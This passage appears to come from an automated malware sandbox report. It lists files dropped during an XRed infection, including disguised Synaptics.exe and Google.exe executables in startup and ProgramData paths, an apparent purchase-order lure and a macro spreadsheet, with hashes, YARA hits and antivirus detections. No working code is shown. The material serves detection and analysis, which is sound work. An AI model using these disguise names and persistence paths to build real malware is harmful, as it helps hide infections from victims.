                                                                                                                                                                          SSDEEP:12288:qkWKkxDLXntJni4forp7T2sBCnRke3jTCaD:/W3DbtJnTfor52Xke3j
                                                                                                                                                                          MD5:5B6A20927752DEEEFA5B7A2BB0ACABC8
                                                                                                                                                                          SHA1:F195D8AE611AD2D1CFE9AA9171C49BFCDEE282A7
                                                                                                                                                                          SHA-256:E1090B4E6EBF966DCC3E8EF26CD3EE35CC77B02FF7AE98651CCC201555DFA120
                                                                                                                                                                          SHA-512:1F916F8815214F5D9733EEE2FB0258998EF63F9F74707ED99226D231525ABBAC40937AB06F2DC51A452F9982BC1F5A1E728854BD51B1F8EB2BA35BDA727AA391
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:MDMP..a..... ........zrg............DA..........<...LH......$....B..........T.......8...........T...........@~..:i-..........g..........ti..............................................................................eJ.......j......GenuineIntel............T.......4....zrg............................. ..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER68BF.tmp.WERInternalMetadata.xml

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):8356
                                                                                                                                                                          Entropy (8bit):3.698536941929479
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:R6l7wVeJMxU6us6YSRSUTgmfik4c5Yprw89bTgsfWQxm:R6lXJj6us6YkSUTgmft4c2TzfWb
                                                                                                                                                                          MD5:17C6137ACD3E8057DE1C50E9E0A4BAD5
                                                                                                                                                                          SHA1:612BA79597D4CE5F6663A9FB09D34B9FA4BDE486
                                                                                                                                                                          SHA-256:641D1073EC30EB206155A95DD3417E5655ED3E0ECFAD1D90CF7EB6CD76CB5B72
                                                                                                                                                                          SHA-512:D22416BED85171FB3982344348C6C758802C819358A8A1188A95A0F025526131867F8EDEEEEC28A9453612945349AD9335E0A1F7B91BA60B0D6463D6B0156EE4
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.3.2.<./.P.i.

                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER68EF.tmp.xml

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):4590
                                                                                                                                                                          Entropy (8bit):4.463134283916425
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:cvIwWl8zsBJg77aI9s/WpW8VYEYm8M4JFJF4+q8nLc5ZN9d:uIjfTI7iu7V8Ju2mZN9d
                                                                                                                                                                          MD5:79343E6DE47CCC17A871252A4A4AED18
                                                                                                                                                                          SHA1:A2597B8A513BC496032AB1B01BC88BC38E582BD4
                                                                                                                                                                          SHA-256:5B39500C363E528DAA6995C9F14BD00CED949D77445012227A2D2F737250B2AA
                                                                                                                                                                          SHA-512:0F47A8D2147AA2C6476979CDE27C7AC565D8297E29476ABC52102B2DCB31844970AD7D652960E95491DB243633FE02F70D9DAC514F63278301B401ACC572CC2E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653872" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER8FA4.tmp.dmp

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Mon Dec 30 10:48:59 2024, 0x1205a4 type
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2353774
                                                                                                                                                                          Entropy (8bit):1.4956717323563022
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6144:yLzF7kEr55bikYG5Y0ynaXqxZxWp4k+uZWm3BjmzR:ynF/GkY2Y0wa6op4Tm3hmzR
                                                                                                                                                                          MD5:DCC44E89C6C9654EF40C09660D7C4D3C
                                                                                                                                                                          SHA1:EAD7EE7C184FD94DC9A267E9C31D9B209C7446D5
                                                                                                                                                                          SHA-256:F3071BD5DCA5E77CB6A811B14577CF474D47A5B7FBA241ECB35E358F484206A6
                                                                                                                                                                          SHA-512:EB65C20E9B6BACE33205C3C100751E0272C31A9B9203100E2EA50B3D52AF8E5DE0A867426AD27EDB967E59C698393A15C0385D8B1802F5A7AEC7C132E7825A55
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:MDMP..a..... ........zrg....................................................T.......8...........T................e#..........2..........p4..............................................................................eJ.......5......GenuineIntel............T.......|....zrg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERA2BF.tmp.WERInternalMetadata.xml

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):6310
                                                                                                                                                                          Entropy (8bit):3.7133705497783254
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:R6l7wVeJhxY69GtMPgYirJkJPmYpDr89bmpsfTbim:R6lXJI6MMIYGJkJPgmCfT/
                                                                                                                                                                          MD5:8111B748A116203A2A366A09B38F3041
                                                                                                                                                                          SHA1:0390B4181DA315B2F7FFBB02349C60FAB3ED98AF
                                                                                                                                                                          SHA-256:19121C9953C1AE76E443D54BCA6D1910A596E35D1D723E4004EE1200AD1C54C5
                                                                                                                                                                          SHA-512:29239831C26E070BA15A86DF15E2A318011CF1E28240917D4EE9900CD5CD1AC56700B0ADD002745BD13F3415BB6B2CF9D9082DA4D5213C32407ED1F581A52B22
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.6.0.<./.P.i.

                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERA30E.tmp.xml

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):4580
                                                                                                                                                                          Entropy (8bit):4.440706577788967
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:cvIwWl8zsQJg77aI9s/WpW8VYgYm8M4JFFF9RP+q8ZDJc5Zfd:uIjfWI7iu7VAJVPyJmZfd
                                                                                                                                                                          MD5:2E6CA2ECD5966C9DD5020FB18B4C6216
                                                                                                                                                                          SHA1:DD45A0E9896F293C7C287E413C68A8D3492DF84E
                                                                                                                                                                          SHA-256:88E20995AB6189F939804CD90A1AEA1FFFBD0D6F15A8D3A2DCB67D5E329949BE
                                                                                                                                                                          SHA-512:B291FC68DE3151B31CF70BA8FFF472876B5B02F73175EC5B6B3A40AD8E0CC09FC389366586332D9A6167744C2F7EC9974B92070A43518C5179B767CEA52657D6
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653871" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE47.tmp.dmp

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, CheckSum 0x00000004, Mon Dec 30 10:49:07 2024, 0x1205a4 type
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):65040
                                                                                                                                                                          Entropy (8bit):2.604396750002626
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:9W9mn67HV/3vCY8cUsDJVxkgLClHDy5KiqNAH3/3zqr:9W9kw1vvC0xkZlAKiqN6/u
                                                                                                                                                                          MD5:B04927CD7D402EC1DDBDC4788F3AACFE
                                                                                                                                                                          SHA1:19635CE322EBB0A49FA5BDAC10B7702F1778E134
                                                                                                                                                                          SHA-256:D5C5F0BB7E1CD63AC256337F407D4685F1B51AD55D0279FA357C4F0517884D83
                                                                                                                                                                          SHA-512:F70D4B2C50074913FD0103A7B0213CBB83B4F7A4D27811868DD67B2AF15A7EEEC5AC990A6287FC7E4AD1C496726B7DF3C35929FA91D21A6E67118E094A5775EE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:MDMP..a..... ........zrg............4...............<.......$....4..........T.......8...........T............v...............&...........(..............................................................................eJ......h)......GenuineIntel............T.......|....zrg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF62.tmp.WERInternalMetadata.xml

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):6310
                                                                                                                                                                          Entropy (8bit):3.6921036236609632
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:R6l7wVeJhxp6DPHeYirJk7YpDZ89bxbZsfhLjm:R6lXJZ6iYGJkPxbyft6
                                                                                                                                                                          MD5:A8C7FE001F67A37AC246D0BFD4C95169
                                                                                                                                                                          SHA1:3B1529D11A99B78008008E56DFEC175AA17C81BC
                                                                                                                                                                          SHA-256:E8918257D79295F4F78D738505BCCEFB35130B0059E813CD899F076B56BD1481
                                                                                                                                                                          SHA-512:CE6A151B97C2C59EC1768C98052F25781CA6404A3178D667A58C25BF294DE9C4C107321E9EF20CE874CFA21565D11318C3666CBF4D50F510CEC30F1AD3852044
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.6.0.<./.P.i.

                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERAFA1.tmp.xml

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):4580
                                                                                                                                                                          Entropy (8bit):4.4417188413069315
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:cvIwWl8zsQJg77aI9s/WpW8VY8zYm8M4JFFFaE+q8ZDJc5Zfd:uIjfWI7iu7VZmJwEyJmZfd
                                                                                                                                                                          MD5:DE5371F67D7F841D8742F1ED4D9C2536
                                                                                                                                                                          SHA1:BCE6E11A7BE6D3BE1A741F3CE5FED968824AFFD7
                                                                                                                                                                          SHA-256:DEEDB218A20A45CF3D68482152A1BAA6F7869E4131CBC8F07A4C8EA3074C47A9
                                                                                                                                                                          SHA-512:60DA916C86B63C4DEA2E3B402AE1F78320F37C8590CD828524A2D28B086D7AF3B9E996C571A3926E5BA9AF89476CADF37FC41D597FEF895CD57F667A4B8D739D
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653871" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                          C:\ProgramData\Synaptics\RCX4FAD.tmp

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):771584
                                                                                                                                                                          Entropy (8bit):6.638013190381294
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                                                                                          MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                                                          SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                                                                                          SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                                                                                          SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Yara Hits:
                                                                                                                                                                          • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX4FAD.tmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX4FAD.tmp, Author: Joe Security
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                          • Filename: valyzt.msi, Detection: malicious, Browse
                                                                                                                                                                          • Filename: New PO - Supplier 16-12-2024-Pdf.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: Purchase-Order.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: hoaiuy.msi, Detection: malicious, Browse
                                                                                                                                                                          • Filename: 222.msi, Detection: malicious, Browse
                                                                                                                                                                          • Filename: Machine-PO.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: 222.exe, Detection: malicious, Browse
                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                          C:\ProgramData\Synaptics\Synaptics.exe

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2208256
                                                                                                                                                                          Entropy (8bit):7.058935933771513
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:49152:AnsHyjtk2MYC5GDokwkn9IMHeaXA0COysPklzMKGmPyaPCSO:Ansmtk2aCdnV/MOKpPCt
                                                                                                                                                                          MD5:A6BD561711EA8C2064C20644CCEEE074
                                                                                                                                                                          SHA1:CB330A1AD78387BDC401142FEECAC763AC63D3D9
                                                                                                                                                                          SHA-256:E6F8EDCBE69419008B7E54F8554FC1AEC66208DE10C26A982D624EA91AED8092
                                                                                                                                                                          SHA-512:62D55F02D14D122B10A0EF08DFA5FFA950F4153863246E3F6E6A6BD1A4D1C63321C7C4E9FB4306C0535E73389D764CC0646C0821A62FD50A2896EC49F205490B
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Yara Hits:
                                                                                                                                                                          • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                          • Filename: Machine-PO.exe, Detection: malicious, Browse
                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................."..................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2208256
                                                                                                                                                                          Entropy (8bit):7.058935933771513
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:49152:AnsHyjtk2MYC5GDokwkn9IMHeaXA0COysPklzMKGmPyaPCSO:Ansmtk2aCdnV/MOKpPCt
                                                                                                                                                                          MD5:A6BD561711EA8C2064C20644CCEEE074
                                                                                                                                                                          SHA1:CB330A1AD78387BDC401142FEECAC763AC63D3D9
                                                                                                                                                                          SHA-256:E6F8EDCBE69419008B7E54F8554FC1AEC66208DE10C26A982D624EA91AED8092
                                                                                                                                                                          SHA-512:62D55F02D14D122B10A0EF08DFA5FFA950F4153863246E3F6E6A6BD1A4D1C63321C7C4E9FB4306C0535E73389D764CC0646C0821A62FD50A2896EC49F205490B
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Yara Hits:
                                                                                                                                                                          • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe, Author: Joe Security
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................."..................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\._cache_Google.exe

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1436672
                                                                                                                                                                          Entropy (8bit):7.208680290347871
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24576:W4lavt0LkLL9IMixoEgeaXA0Cw9ysPkOgDOWabKOq5qfbmp9Oe4q9MmCS:hkwkn9IMHeaXA0COysPklzMKGmPyaPCS
                                                                                                                                                                          MD5:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                          SHA1:84E7DB884577DF03C7A4FEB54651985D76856C16
                                                                                                                                                                          SHA-256:78BCE6367FA6F47F8FF5F2E72A4F91065AD36F470860DA23542D450EFD1F896E
                                                                                                                                                                          SHA-512:551E4A88495F9E18C226E27CC342E968C659EC93AC5E7ADF4A23F1B0ED3D915FAE3BCE61E0845F5DB7882A0DFFF451F3D3839D00A03AE984E80BFE2E7AB8953F
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....._g.........."..........(.......k............@..........................P............@...@.......@.....................lk..|....@...V...................... l..................................p'..@...............X............................text...t........................... ..`.rdata..j...........................@..@.data...4........b..................@....rsrc....V...@...X..................@..@.reloc..b............F..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\1QGQHkIB.xlsm

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:Microsoft Excel 2007+
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):18387
                                                                                                                                                                          Entropy (8bit):7.523057953697544
                                                                                                                                                                          Encrypted:false
